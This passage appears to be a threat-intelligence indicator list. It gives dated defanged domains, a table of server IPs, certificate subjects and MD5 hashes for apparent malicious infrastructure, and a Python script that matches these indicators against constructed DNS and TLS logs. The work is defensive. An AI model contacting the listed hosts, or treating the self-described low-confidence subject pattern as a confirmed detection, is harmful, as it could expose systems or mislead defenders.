        2/26/20

        topserviceupdater[.]com

        2/27/20

        myserviceupdater[.]com

        2/29/20

        myservicebooster[.]net

        2/29/20

        servicesbooster[.]org

        2/29/20

        brainschampions[.]com

        2/29/20

        myservicebooster[.]com

        2/29/20

        topservicesbooster[.]com

        2/29/20

        servicesbooster[.]com

        2/29/20

        topservicesecurity[.]org

        2/29/20

        topservicesecurity[.]net

        2/29/20

        topsecurityservice[.]net

        2/29/20

        myyserviceupdater[.]com

        2/29/20

        topservicesupdate[.]com

        2/29/20

        topservicesecurity[.]com

        2/29/20

        servicesecurity[.]org

        2/29/20

        myserviceconnect[.]net

        3/2/20

        topservicesupdates[.]com

        3/2/20

        yoursuperservice[.]com

        3/2/20

        topservicehelper[.]com

        3/2/20

        serviceuphelper[.]com

        3/2/20

        serviceshelpers[.]com

        3/2/20

        boostsecuritys[.]com

        3/3/20

        hakunamatatata[.]com

        3/8/20

        service-updater[.]com

        3/9/20

        secondserviceupdater[.]com

        3/9/20

        twelvethserviceupdater[.]com

        3/9/20

        twentiethservicehelper[.]com

        3/9/20

        twelfthservicehelper[.]com

        3/9/20

        tenthservicehelper[.]com

        3/9/20

        thirdserviceupdater[.]com

        3/9/20

        thirdservicehelper[.]com

        3/9/20

        tenthserviceupdater[.]com

        3/9/20

        thirteenthservicehelper[.]com

        3/9/20

        seventeenthservicehelper[.]com

        3/9/20

        sixteenthservicehelper[.]com

        3/9/20

        sixthservicehelper[.]com

        3/9/20

        seventhservicehelper[.]com

        3/9/20

        seventhserviceupdater[.]com

        3/9/20

        sixthserviceupdater[.]com

        3/9/20

        secondservicehelper[.]com

        3/9/20

        ninthservicehelper[.]com

        3/9/20

        ninethserviceupdater[.]com

        3/9/20

        fourteenthservicehelper[.]com

        3/9/20

        fourthserviceupdater[.]com

        3/9/20

        firstserviceupdater[.]com

        3/9/20

        firstservisehelper[.]com

        3/9/20

        fifthserviceupdater[.]com

        3/9/20

        eleventhserviceupdater[.]com

        3/9/20

        fifthservicehelper[.]com

        3/9/20

        fourservicehelper[.]com

        3/9/20

        eighthservicehelper[.]com

        3/9/20

        eighteenthservicehelper[.]com

        3/9/20

        eighthserviceupdater[.]com

        3/9/20

        fifteenthservicehelper[.]com

        3/9/20

        nineteenthservicehelper[.]com

        3/9/20

        eleventhservicehelper[.]com

        3/14/20

        thirdservice-developer[.]com

        3/14/20

        fifthservice-developer[.]com

        3/15/20

        firstservice-developer[.]com

        3/16/20

        fourthservice-developer[.]com

        3/16/20

        ninethservice-developer[.]com

        3/16/20

        seventhservice-developer[.]com

        3/16/20

        secondservice-developer[.]com

        3/16/20

        sixthservice-developer[.]com

        3/16/20

        tenthservice-developer[.]com

        3/16/20

        eithtservice-developer[.]com

        3/17/20

        servicedupdater[.]com

        3/17/20

        service-updateer[.]com

        3/19/20

        sexyservicee[.]com

        3/19/20

        serviceboostnumberone[.]com

        3/19/20

        servicedbooster[.]com

        3/19/20

        service-hunter[.]com

        3/19/20

        servicedhunter[.]com

        3/19/20

        servicedpower[.]com

        3/19/20

        sexycservice[.]com

        3/23/20

        yourserviceupdater[.]com

        3/23/20

        top-serviceupdater[.]com

        3/23/20

        top-servicebooster[.]com

        3/23/20

        serviceshelps[.]com

        3/23/20

        servicemonsterr[.]com

        3/23/20

        servicehunterr[.]com

        3/23/20

        service-helpes[.]com

        3/23/20

        servicecheckerr[.]com

        3/23/20

        newservicehelper[.]com

        3/23/20

        huntersservice[.]com

        3/23/20

        helpforyourservice[.]com

        3/23/20

        boostyourservice[.]com

        3/26/20

        developmasters[.]com

        3/26/20

        actionshunter[.]com

        5/4/20

        info-develop[.]com

        5/4/20

        ayechecker[.]com

        5/4/20

        service-booster[.]com

        9/18/20

        zapored[.]com

| 9/22/20 | gtrsqer[.]com |
| 9/22/20 | chalengges[.]com |
| 9/22/20 | caonimas[.]com |
| 9/22/20 | hakunaman[.]com |
| 9/22/20 | getinformationss[.]com |
| 9/22/20 | nomadfunclub[.]com |
| 9/22/20 | harddagger[.]com |
| 9/22/20 | errvghu[.]com |
| 9/22/20 | reginds[.]com |
| 9/22/20 | gameleaderr[.]com |
| 9/22/20 | razorses[.]com |
| 9/22/20 | vnuret[.]com |
| 9/22/20 | regbed[.]com |
| 9/22/20 | bouths[.]com |
| 9/23/20 | ayiyas[.]com |
| 9/23/20 | serviceswork[.]net |
| 9/23/20 | moonshardd[.]com |
| 9/23/20 | hurrypotter[.]com |
| 9/23/20 | biliyilish[.]com |
| 9/23/20 | blackhoall[.]com |
| 9/23/20 | checkhunterr[.]com |
| 9/23/20 | daggerclip[.]com |
| 9/23/20 | check4list[.]com |
| 9/24/20 | chainnss[.]com |
| 9/29/20 | hungrrybaby[.]com |
| 9/30/20 | martahzz[.]com |
| 10/1/20 | jonsonsbabyy[.]com |
| 10/1/20 | wondergodst[.]com |
| 10/1/20 | zetrexx[.]com |
| 10/1/20 | tiancaii[.]com |
| 10/1/20 | cantliee[.]com |
| 10/1/20 | realgamess[.]com |
| 10/1/20 | maybebaybe[.]com |
| 10/1/20 | saynoforbubble[.]com |
| 10/1/20 | chekingking[.]com |
| 10/1/20 | rapirasa[.]com |
| 10/1/20 | raidbossa[.]com |
| 10/1/20 | mountasd[.]com |
| 10/1/20 | puckhunterrr[.]com |
| 10/1/20 | pudgeee[.]com |
| 10/1/20 | loockfinderrs[.]com |
| 10/1/20 | lindasak[.]com |
| 10/1/20 | bithunterr[.]com |
| 10/1/20 | voiddas[.]com |
| 10/1/20 | sibalsakie[.]com |
| 10/1/20 | giveasees[.]com |
| 10/1/20 | shabihere[.]com |
| 10/1/20 | tarhungangster[.]com |
| 10/1/20 | imagodd[.]com |
| 10/1/20 | raaidboss[.]com |
| 10/1/20 | sunofgodd[.]com |
| 10/1/20 | rulemonster[.]com |
| 10/1/20 | loxliver[.]com |
| 10/1/20 | servicegungster[.]com |
| 10/1/20 | kungfupandasa[.]com |
| 10/2/20 | check1domains[.]com |
| 10/5/20 | sweetmonsterr[.]com |
| 10/5/20 | qascker[.]com |
| 10/7/20 | remotessa[.]com |
| 10/7/20 | cheapshhot[.]com |
| 10/7/20 | havemosts[.]com |
| 10/7/20 | unlockwsa[.]com |
| 10/7/20 | sobcase[.]com |
| 10/7/20 | zhameharden[.]com |
| 10/7/20 | mixunderax[.]com |
| 10/7/20 | bugsbunnyy[.]com |
| 10/7/20 | fastbloodhunter[.]com |
| 10/7/20 | serviceboosterr[.]com |
| 10/7/20 | servicewikii[.]com |
| 10/7/20 | secondlivve[.]com |
| 10/7/20 | quwasd[.]com |
| 10/7/20 | luckyhunterrs[.]com |
| 10/7/20 | wodemayaa[.]com |
| 10/7/20 | hybriqdjs[.]com |
| 10/7/20 | gunsdrag[.]com |
| 10/7/20 | gungameon[.]com |
| 10/7/20 | servicemount[.]com |
| 10/7/20 | servicesupdater[.]com |
| 10/7/20 | service-boosterr[.]com |
| 10/7/20 | serviceupdatter[.]com |
| 10/7/20 | dotmaingame[.]com |
| 10/12/20 | backup1service[.]com |
| 10/13/20 | bakcup-monster[.]com |
| 10/13/20 | bakcup-checker[.]com |
| 10/13/20 | backup-simple[.]com |
| 10/13/20 | backup-leader[.]com |
| 10/13/20 | backup-helper[.]com |
| 10/13/20 | service-checker[.]com |
| 10/13/20 | nasmastrservice[.]com |
| 10/14/20 | service-leader[.]com |
| 10/14/20 | nas-simple-helper[.]com |
| 10/14/20 | nas-leader[.]com |
| 10/14/20 | boost-servicess[.]com |
| 10/14/20 | elephantdrrive[.]com |
| 10/15/20 | service-hellper[.]com |
| 10/16/20 | top-backuphelper[.]com |
| 10/16/20 | best-nas[.]com |
| 10/16/20 | top-backupservice[.]com |
| 10/16/20 | bestservicehelper[.]com |
| 10/16/20 | backupnas1[.]com |
| 10/16/20 | backupmastter[.]com |
| 10/16/20 | best-backup[.]com |
| 10/17/20 | viewdrivers[.]com |
| 10/19/20 | topservicebooster[.]com |
| 10/19/20 | topservice-masters[.]com |
| 10/19/20 | topbackupintheworld[.]com |
| 10/19/20 | topbackup-helper[.]com |
| 10/19/20 | simple-backupbooster[.]com |
| 10/19/20 | top3-services[.]com |
| 10/19/20 | backup1services[.]com |
| 10/21/20 | backupmaster-service[.]com |
| 10/21/20 | backupmasterservice[.]com |
| 10/21/20 | service1updater[.]com |
| 10/21/20 | driverdwl[.]com |
| 10/21/20 | backup1master[.]com |
| 10/21/20 | boost-yourservice[.]com |
| 10/21/20 | checktodrivers[.]com |
| 10/21/20 | backup1helper[.]com |
| 10/21/20 | driver1updater[.]com |
| 10/21/20 | driver1master[.]com |
| 10/23/20 | view-backup[.]com |
| 10/23/20 | top3servicebooster[.]com |
| 10/23/20 | servicereader[.]com |
| 10/23/20 | servicehel[.]com |
| 10/23/20 | driver-boosters[.]com |
| 10/23/20 | service1update[.]com |
| 10/23/20 | service-hel[.]com |
| 10/23/20 | driver1downloads[.]com |
| 10/23/20 | service1view[.]com |
| 10/23/20 | backups1helper[.]com |
| 10/25/20 | idriveview[.]com |
| 10/26/20 | debug-service[.]com |
| 10/26/20 | idrivedwn[.]com |
| 10/28/20 | driverjumper[.]com |
| 10/28/20 | service1boost[.]com |
| 10/28/20 | idriveupdate[.]com |
| 10/28/20 | idrivehepler[.]com |
| 10/28/20 | idrivefinder[.]com |
| 10/28/20 | idrivecheck[.]com |
| 10/28/20 | idrivedownload[.]com |

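The domain list above and the certificate table that follows are only useful once they are matched against telemetry: DNS queries for the listed names (and their subdomains), and TLS sessions whose server certificate carries a listed MD5 or CN. The script below is an added example written for this page, not code from the original report. It embeds a small subset of the page's own IOC rows, refangs the `[.]` notation, and runs both lookups over constructed DNS and TLS log lines (the benign servers use RFC 5737 documentation addresses; none of the log data comes from a real network). The lowest-confidence check, a regular expression for the recurring self-signed subject `C=US,ST=TX,L=Texas,O=lol` / `O=office`, is an assumption drawn from the table's repeated values rather than a detection the report itself proposes.

```python
"""Match the domain and TLS-certificate indicators from this page against telemetry.

Added example; not code from the original report. The IOC rows are a subset
copied from the page's tables. DNS_LOG and TLS_LOG are constructed for the
demonstration and do not come from any real environment.
"""
from __future__ import annotations

import re
from collections import namedtuple

# Subset of the domain table on this page: "first seen | defanged domain".
DOMAIN_IOC_ROWS = """\
9/22/20 | gtrsqer[.]com
10/13/20 | backup-helper[.]com
10/28/20 | idrivedownload[.]com
"""

# Subset of the certificate table on this page: "First Seen | Server | Subject | MD5".
CERT_IOC_ROWS = """\
1/29/20 | 45.76.20.140:443 | CN=cylenceprotect[.]com | da6ce63f4a52244c3dced32f7164038a
3/9/20 | 194.26.29.230:443 | CN=secondserviceupdater[.]com | c30a4809c9a77cfc09314a63f7055bf7
10/13/20 | 45.147.229.44:443 | C=US,ST=TX,L=Texsa,O=lol,OU=,CN=backup-helper[.]com | 938593ac1c8bdb2c5256540d7c8476c8
"""

# Assumption: the recurring self-signed subject in the table is worth hunting for on its own.
# Low confidence; it also misses rows with other O= values (dagger, zapored, serviceswork, US).
GENERIC_SUBJECT = re.compile(r"^C=US,ST=[A-Z]{2},L=[A-Za-z]+,O=(?:lol|office),OU=,CN=", re.I)

CertIoc = namedtuple("CertIoc", "first_seen server subject md5")  # server is ip:port, md5 lowercase


def refang(value: str) -> str:
    """Undo the [.] defanging used in reports so the value can be compared with logs."""
    return value.replace("[.]", ".").strip()


def subject_cn(subject: str) -> str | None:
    """Pull the CN attribute out of a comma-separated subject DN (lowercased)."""
    m = re.search(r"(?:^|,)CN=([^,]+)", subject, re.I)
    return m.group(1).strip().lower() if m else None


def parse_domain_iocs(text: str) -> set[str]:
    """Parse 'date | domain' rows into a set of lowercase, refanged domains."""
    domains: set[str] = set()
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("|")]
        if len(parts) == 2 and parts[1]:
            domains.add(refang(parts[1]).lower())
    return domains


def parse_cert_iocs(text: str) -> list[CertIoc]:
    """Parse 'first seen | server | subject | md5' rows; malformed rows are skipped."""
    out: list[CertIoc] = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != 4:
            continue
        first_seen, server, subject, md5 = parts
        out.append(CertIoc(first_seen, server, refang(subject), md5.lower()))
    return out


# Constructed DNS query log: "<utc timestamp> <client ip> <queried name>".
DNS_LOG = """\
2020-10-14T09:12:01Z 10.0.4.21 backup-helper.com
2020-10-14T09:12:05Z 10.0.4.21 updates.example.org
2020-10-14T09:13:40Z 10.0.7.3 www.idrivedownload.com
"""

# Constructed TLS log, tab-separated: timestamp, client ip, server ip:port, cert subject DN, cert md5.
TLS_LOG = """\
2020-10-14T09:12:02Z\t10.0.4.21\t45.147.229.44:443\tC=US,ST=TX,L=Texsa,O=lol,OU=,CN=backup-helper.com\t938593ac1c8bdb2c5256540d7c8476c8
2020-10-14T09:20:00Z\t10.0.9.8\t203.0.113.5:443\tCN=www.example.org\t00000000000000000000000000000001
2020-10-14T09:25:00Z\t10.0.9.8\t198.51.100.7:443\tC=US,ST=TX,L=Texas,O=lol,OU=,CN=notlisted.com\t00000000000000000000000000000002
"""


def match_dns(log: str, iocs: set[str]) -> list[tuple[str, str]]:
    """Return (client, qname) for queries whose name is, or is under, an IOC domain."""
    hits = []
    for line in log.splitlines():
        _ts, client, qname = line.split()
        q = qname.lower().rstrip(".")
        labels = q.split(".")
        # Test every suffix with at least two labels so host.ioc-domain.com also fires.
        if any(".".join(labels[i:]) in iocs for i in range(len(labels) - 1)):
            hits.append((client, q))
    return hits


def match_tls(log: str, cert_iocs: list[CertIoc], domain_iocs: set[str]) -> list[tuple[str, str, str]]:
    """Return (client, server, reason) for sessions touching a listed cert or domain.

    Precedence: exact certificate MD5, then CN equal to a listed CN or domain,
    then the generic self-signed subject pattern (lowest confidence).
    """
    known_md5 = {c.md5 for c in cert_iocs}
    known_cn = {subject_cn(c.subject) for c in cert_iocs}
    hits = []
    for line in log.splitlines():
        _ts, client, server, subject, md5 = line.split("\t")
        cn = subject_cn(subject)
        if md5.lower() in known_md5:
            hits.append((client, server, "cert-md5"))
        elif cn in known_cn or cn in domain_iocs:
            hits.append((client, server, "cert-cn"))
        elif GENERIC_SUBJECT.search(subject):
            hits.append((client, server, "subject-pattern"))
    return hits
```

Two points of tuning matter in practice. The MD5 check is exact to one certificate, so an operator who re-issues a certificate for the same CN is only caught by the CN and subject-pattern checks; keep all three, and treat a `subject-pattern` hit as a lead to triage (it will also fire on unrelated self-signed certificates with the same boilerplate subject), not as a confirmed match. On the DNS side, matching every suffix rather than the exact name is what catches `www.` and other host labels in front of a listed domain.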

| First Seen | Server | Subject | MD5 |
|---|---|---|---|
| 12/12/19 | 140.82.60.155:443 | CN=updatemanagir[.]us | ec16be328c09473d5e5c07310583d85a |
| 12/21/19 | 96.30.192.141:443 | CN=cmdupdatewin[.]com | 3d4de17df25412bb714fda069f6eb27e |
| 1/6/20 | 45.76.49.78:443 | CN=scrservallinst[.]info | cd6035bd51a44b597c1e181576dd44d9 |
| 1/8/20 | 149.248.58.11:443 | CN=updatewinlsass[.]com | 8c581979bd11138ffa3a25b895b97cc0 |
| 1/9/20 | 96.30.193.57:443 | CN=winsystemupdate[.]com | e4e732502b9658ea3380847c60b9e0fe |
| 1/14/20 | 95.179.219.169:443 | CN=jomamba[.]best | 80b7001e5a6e4bd6ec79515769b91c8b |
| 1/16/20 | 140.82.27.146:443 | CN=winsysteminfo[.]com | 29e656ba9d5d38a0c17a4f0dd855b37e |
| 1/19/20 | 45.32.170.9:443 | CN=livecheckpointsrs[.]com | 1de9e9aa8363751c8a71c43255557a97 |
| 1/20/20 | 207.148.8.61:443 | CN=ciscocheckapi[.]com | 97ca76ee9f02cfda2e8e9729f69bc208 |
| 1/28/20 | 209.222.108.106:443 | CN=timesshifts[.]com | 2bb464585f42180bddccb50c4a4208a5 |
| 1/29/20 | 31.7.59.141:443 | CN=updatewinsoftr[.]com | 07f9f766163c344b0522e4e917035fe1 |
| 1/29/20 | 79.124.60.117:443 | C=US | 9722acc9740d831317dd8c1f20d8cfbe |
| 1/29/20 | 66.42.86.61:443 | CN=lsassupdate[.]com | 3c9b3f1e12473a0fd28dc37071168870 |
| 1/29/20 | 45.76.20.140:443 | CN=cylenceprotect[.]com | da6ce63f4a52244c3dced32f7164038a |
| 1/29/20 | 45.76.20.140:80 | CN=cylenceprotect[.]com | da6ce63f4a52244c3dced32f7164038a |
| 1/30/20 | 149.248.5.240:443 | CN=sophosdefence[.]com | e9b4b649c97cdd895d6a0c56015f2e68 |
| 1/30/20 | 144.202.12.197:80 | CN=windefenceinfo[.]com | c6c63024b18f0c5828bd38d285e6aa58 |
| 1/30/20 | 149.248.5.240:80 | CN=sophosdefence[.]com | e9b4b649c97cdd895d6a0c56015f2e68 |
| 1/30/20 | 149.28.246.25:80 | CN=lsasswininfo[.]com | f9af8b7ddd4875224c7ce8aae8c1b9dd |
| 1/30/20 | 144.202.12.197:443 | CN=windefenceinfo[.]com | c6c63024b18f0c5828bd38d285e6aa58 |
| 1/30/20 | 149.28.246.25:443 | CN=lsasswininfo[.]com | f9af8b7ddd4875224c7ce8aae8c1b9dd |
| 1/30/20 | 45.77.119.212:443 | CN=taskshedulewin[.]com | e1dc7cecd3cb225b131bdb71df4b3079 |
| 1/30/20 | 45.77.119.212:80 | CN=taskshedulewin[.]com | e1dc7cecd3cb225b131bdb71df4b3079 |
| 1/30/20 | 149.28.122.130:443 | CN=renovatesystem[.]com | 734c26d93201cf0c918135915fdf96af |
| 1/30/20 | 45.32.170.9:80 | CN=livecheckpointsrs[.]com | 1de9e9aa8363751c8a71c43255557a97 |
| 1/30/20 | 149.248.58.11:80 | CN=updatewinlsass[.]com | 8c581979bd11138ffa3a25b895b97cc0 |
| 1/30/20 | 149.28.122.130:80 | CN=renovatesystem[.]com | 734c26d93201cf0c918135915fdf96af |
| 1/30/20 | 207.148.8.61:80 | CN=ciscocheckapi[.]com | 97ca76ee9f02cfda2e8e9729f69bc208 |
| 1/31/20 | 81.17.25.210:443 | CN=update-wind[.]com | 877bf6c685b68e6ddf23a4db3789fcaa |
| 1/31/20 | 31.7.59.141:80 | CN=updatewinsoftr[.]com | 07f9f766163c344b0522e4e917035fe1 |
| 2/2/20 | 155.138.214.247:80 | CN=cleardefencewin[.]com | 61df4864dc2970de6dcee65827cc9a54 |
| 2/2/20 | 155.138.214.247:443 | CN=cleardefencewin[.]com | 61df4864dc2970de6dcee65827cc9a54 |
| 2/2/20 | 45.76.231.195:443 | CN=checkwinupdate[.]com | d8e5dddeec1a9b366759c7ef624d3b8c |
| 2/2/20 | 45.76.231.195:80 | CN=checkwinupdate[.]com | d8e5dddeec1a9b366759c7ef624d3b8c |
| 2/3/20 | 46.19.142.154:443 | CN=havesetup[.]net | cd354c309f3229aff59751e329d8243a |
| 2/3/20 | 95.179.219.169:80 | CN=jomamba[.]best | 80b7001e5a6e4bd6ec79515769b91c8b |
| 2/3/20 | 140.82.60.155:80 | CN=updatemanagir[.]us | ec16be328c09473d5e5c07310583d85a |
| 2/3/20 | 209.222.108.106:80 | CN=timesshifts[.]com | 2bb464585f42180bddccb50c4a4208a5 |
| 2/3/20 | 66.42.118.123:443 | CN=conhostservice[.]com | 6c21d3c5f6e8601e92ae167a7cff721c |
| 2/4/20 | 80.240.18.106:443 | CN=microsoftupdateswin[.]com | 27cae092ad6fca89cd1b05ef1bb73e62 |
| 2/4/20 | 95.179.215.228:443 | CN=iexploreservice[.]com | 26010bebe046b3a33bacd805c2617610 |
| 2/12/20 | 155.138.216.133:443 | CN=defenswin[.]com | e5005ae0771fcc165772a154b7937e89 |
| 2/12/20 | 45.32.130.5:443 | CN=avrenew[.]com | f32ee1bb35102e5d98af81946726ec1b |
| 2/14/20 | 45.76.167.35:443 | CN=freeallsafe[.]com | 85f743a071a1d0b74d8e8322fecf832b |
| 2/14/20 | 45.63.95.187:443 | CN=easytus[.]com | 17de38c58e04242ee56a9f3a94e6fd53 |
| 2/17/20 | 45.77.89.31:443 | CN=besttus[.]com | 2bda8217bdb05642c995401af3b5c1f3 |
| 2/17/20 | 95.179.147.215:443 | CN=windefens[.]com | 57725c8db6b98a3361e0d905a697f9f8 |
| 2/17/20 | 155.138.216.133:443 | CN=defenswin[.]com | c07774a256fc19036f5c8c60ba418cbf |
| 2/17/20 | 104.238.190.126:443 | CN=aaatus[.]com | 4039af00ce7a5287a3e564918edb77cf |
| 2/17/20 | 144.202.83.4:443 | CN=greattus[.]com | 7f0fa9a608090634b42f5f17b8cecff0 |
| 2/17/20 | 104.156.245.0:443 | CN=comssite[.]com | f5bb98fafe428be6a8765e98683ab115 |
| 2/17/20 | 45.32.30.162:443 | CN=bigtus[.]com | 698fc23ae111381183d0b92fe343b28b |
| 2/17/20 | 108.61.242.184:443 | CN=livetus[.]com | 8bedba70f882c45f968c2d99b00a708a |
| 2/17/20 | 207.148.15.31:443 | CN=findtus[.]com | 15f07ca2f533f0954bbbc8d4c64f3262 |
| 2/17/20 | 149.28.15.247:443 | CN=firsttus[.]com | 88e8551f4364fc647dbf00796536a4c7 |
| 2/21/20 | 155.138.136.182:443 | CN=worldtus[.]com | b31f38b2ccbbebf4018fe5665173a409 |
| 2/25/20 | 45.77.58.172:443 | CN=freeoldsafe[.]com | a46e77b92e1cdfec82239ff54f2c1115 |
| 2/25/20 | 45.77.58.172:443 | CN=freeoldsafe[.]com | a46e77b92e1cdfec82239ff54f2c1115 |
| 2/26/20 | 108.61.72.29:443 | CN=myserviceconnect[.]net | 9f551008f6dcaf8e6fe363caa11a1aed |
| 2/27/20 | 216.155.157.249:443 | CN=myserviceupdater[.]com | 4c6a2c06f1e1d15d6be8c81172d1c50c |
| 2/28/20 | 45.77.98.157:443 | CN=topservicesbooster[.]com | ba4b34962390893852e5cc7fa7c75ba2 |
| 2/28/20 | 104.156.250.132:443 | CN=myservicebooster[.]com | 89be5670d19608b2c8e261f6301620e1 |
| 2/28/20 | 149.28.50.31:443 | CN=topsecurityservice[.]net | 77e2878842ab26beaa3ff24a5b64f09b |
| 2/28/20 | 149.28.55.197:443 | CN=myyserviceupdater[.]com | 0dd8fde668ff8a301390eef1ad2f9b83 |
| 2/28/20 | 207.246.67.70:443 | CN=servicesecurity[.]org | c88098f9a92d7256425f782440971497 |
| 2/28/20 | 63.209.33.131:443 | CN=serviceupdates[.]net | 16e86a9be2bdf0ddc896bc48fcdbb632 |
| 2/29/20 | 45.77.206.105:443 | CN=myservicebooster[.]net | 6e09bb541b29be7b89427f9227c30a32 |
| 2/29/20 | 140.82.5.67:443 | CN=servicesbooster[.]org | 42d2d09d08f60782dc4cded98d7984ed |
| 2/29/20 | 108.61.209.123:443 | CN=brainschampions[.]com | 241ab042cdcb29df0a5c4f853f23dd31 |
| 2/29/20 | 104.156.227.250:443 | CN=servicesbooster[.]com | f45f9296ff2a6489a4f39cd79c7f5169 |
| 2/29/20 | 140.82.10.222:443 | CN=topservicesecurity[.]net | b9375e7df4ee0f83d7abb179039dc2c5 |
| 2/29/20 | 149.28.35.35:443 | CN=topservicesecurity[.]org | 82bd8a2b743c7cc3f3820e386368951d |
| 2/29/20 | 207.148.21.17:443 | CN=topserviceupdater[.]com | ece184f8a1309b781f912d4f4d65738e |
| 2/29/20 | 45.77.153.72:443 | CN=topservicesupdate[.]com | 8330c3fa8ca31a76dc8d7818fd378794 |
| 3/1/20 | 140.82.10.222:80 | CN=topservicesecurity[.]net | b9375e7df4ee0f83d7abb179039dc2c5 |
| 3/1/20 | 207.148.21.17:80 | CN=topserviceupdater[.]com | ece184f8a1309b781f912d4f4d65738e |
| 3/1/20 | 108.61.90.90:443 | CN=topservicesecurity[.]com | 696aeb86d085e4f6032e0a01c496d26c |
| 3/1/20 | 45.32.130.5:80 | CN=avrenew[.]com | f32ee1bb35102e5d98af81946726ec1b |
| 3/2/20 | 217.69.15.175:443 | CN=serviceshelpers[.]com | 9a437489c9b2c19c304d980c17d2e0e9 |
| 3/2/20 | 155.138.135.182:443 | CN=topservicesupdates[.]com | b9deff0804244b52b14576eac260fd9f |
| 3/2/20 | 95.179.210.8:80 | CN=serviceuphelper[.]com | bb65efcead5b979baee5a25756e005d8 |
| 3/2/20 | 45.76.45.162:443 | CN=boostsecuritys[.]com | 7d316c63bdc4e981344e84a017ae0212 |
| 3/4/20 | 108.61.176.237:443 | CN=yoursuperservice[.]com | 7424aaede2f35259cf040f3e70d707be |
| 3/4/20 | 207.246.67.70:443 | CN=servicesecurity[.]org | d66cb5528d2610b39bc3cecc20198970 |
| 3/6/20 | 188.166.52.176:443 | CN=top-servicebooster[.]com | f882c11b294a94494f75ded47f6f0ca0 |
| 3/7/20 | 149.248.56.113:443 | CN=topservicehelper[.]com | 2a29e359126ec5b746b1cc52354b4adf |
| 3/8/20 | 199.247.13.144:443 | CN=hakunamatatata[.]com | e2cd3c7e2900e2764da64a719096c0cb |
| 3/8/20 | 95.179.210.8:443 | CN=serviceuphelper[.]com | bb65efcead5b979baee5a25756e005d8 |
| 3/8/20 | 207.246.67.70:443 | CN=servicesecurity[.]org | d89f6bdc59ed5a1ab3c1ecb53c6e571c |
| 3/9/20 | 194.26.29.230:443 | CN=secondserviceupdater[.]com | c30a4809c9a77cfc09314a63f7055bf7 |
| 3/9/20 | 194.26.29.229:443 | CN=firstserviceupdater[.]com | bc86a3087f238014b6c3a09c2dc3df42 |
| 3/9/20 | 194.26.29.232:443 | CN=fourthserviceupdater[.]com | 3dc6d12c56cc79b0e3e8cd7b8a9c320b |
| 3/9/20 | 194.26.29.234:443 | CN=sixthserviceupdater[.]com | 951e29ee8152c1e7f63e8ccb6b7031c1 |
| 3/9/20 | 194.26.29.235:443 | CN=seventhserviceupdater[.]com | abe1ce0f83459a7fe9c72839fc46330b |
| 3/9/20 | 194.26.29.236:443 | CN=eighthserviceupdater[.]com | c7a539cffdd230a4ac9a4754c2c68f12 |
| 3/9/20 | 194.26.29.237:443 | CN=ninethserviceupdater[.]com | 1d1f7bf2c0eec7a3a0221fd473ddbafc |
| 3/9/20 | 194.26.29.225:443 | CN=seventeenthservicehelper[.]com | 6b1e0621f4d891b8575a229384d0732d |
| 3/9/20 | 194.26.29.227:443 | CN=nineteenthservicehelper[.]com | 38756ffb8f2962f6071e770637a2d962 |
| 3/9/20 | 194.26.29.242:443 | CN=thirdservicehelper[.]com | 3b911032d08ff4cb156c064bc272d935 |
| 3/9/20 | 194.26.29.244:443 | CN=tenthservicehelper[.]com | a2d9b382fe32b0139197258e3e2925c4 |
| 3/9/20 | 194.26.29.226:443 | CN=eighteenthservicehelper[.]com | 4acbca8efccafd92da9006d0cc91b264 |
| 3/9/20 | 194.26.29.243:443 | CN=ninthservicehelper[.]com | 0760ab4a6ed9a124aabb8c377beead54 |
| 3/9/20 | 194.26.29.201:443 | CN=secondservicehelper[.]com | d8a8d0ad9226e3c968c58b5d2324d899 |
| 3/9/20 | 194.26.29.202:443 | CN=thirdservicehelper[.]com | 0d3b79158ceee5b6ce859bb3fc501b02 |
| 3/9/20 | 194.26.29.220:443 | CN=fourservicehelper[.]com | 831e0445ea580091275b7020f2153b08 |
| 3/11/20 | 207.246.67.70:80 | CN=servicesecurity[.]org | d89f6bdc59ed5a1ab3c1ecb53c6e571c |
| 3/13/20 | 165.227.196.0:443 | CN=twentiethservicehelper[.]com | 977b4abc6307a9b3732229d4d8e2c277 |
| 3/14/20 | 45.141.86.91:443 | CN=thirdservice-developer[.]com | edc2680e3797e11e93573e523bae7265 |
| 3/14/20 | 194.26.29.219:443 | CN=firstservisehelper[.]com | 6b444a2cd3e12d4c3feadec43a30c4d6 |
| 3/14/20 | 45.141.86.93:443 | CN=fifthservice-developer[.]com | 60e7500c809f12fe6be5681bd41a0eda |
| 3/15/20 | 45.141.86.90:443 | CN=secondservice-developer[.]com | de9460bd6b1badb7d8314a381d143906 |
| 3/15/20 | 45.141.86.84:443 | CN=firstservice-developer[.]com | 6385acd425e68e1d3fce3803f8ae06be |
| 3/17/20 | 45.141.86.96:443 | CN=eithtservice-developer[.]com | e1d1fb4a6f09fb54e09fb27167028303 |
| 3/17/20 | 45.141.86.92:443 | CN=fourthservice-developer[.]com | 5b5375bf30aedfa3a44d758fe42fccba |
| 3/18/20 | 45.141.86.94:443 | CN=sixthservice-developer[.]com | 4d42bea1bfc7f1499e469e85cf75912c |
| 3/18/20 | 108.61.209.121:443 | CN=service-booster[.]com | 692ed54fb1fb189c36d2f1674db47e45 |
| 3/18/20 | 134.122.116.114:443 | CN=service-helpes[.]com | ad0914f72f1716d810e7bd8a67c12a71 |
| 3/18/20 | 209.97.130.197:443 | CN=helpforyourservice[.]com | 00fe3cc532f876c7505ddbf5625de404 |
| 3/18/20 | 192.241.143.121:443 | CN=serviceshelps[.]com | e50998208071b4e5a70110b141542747 |
| 3/18/20 | 45.141.86.95:443 | CN=seventhservice-developer[.]com | 413ca4fa49c3eb6eef0a6cbc8cac2a71 |
| 3/18/20 | 198.211.116.199:443 | CN=actionshunter[.]com | 8e5bedbe832d374b565857cce294f061 |
| 3/18/20 | 45.141.86.155:443 | CN=sexyservicee[.]com | cca37e58b23de9a1db9c3863fe2cd57c |
| 3/19/20 | 194.26.29.239:443 | CN=eleventhserviceupdater[.]com | 7e0fcb78055f0eb12bc8417a6933068d |
| 3/19/20 | 45.141.86.206:443 | CN=servicedhunter[.]com | fdefb427dcf3f0257ddc53409ff71d22 |
| 3/19/20 | 45.141.86.92:443 | CN=service-updateer[.]com | 51ba9c03eac37751fe06b7539964e3de |
| 3/19/20 | 134.122.116.59:443 | CN=servicedbooster[.]com | db7797a20a5a491fb7ad0d4c84acd7e8 |
| 3/19/20 | 134.122.118.46:443 | CN=servicedpower[.]com | 7b57879bded28d0447eea28bacc79fb5 |
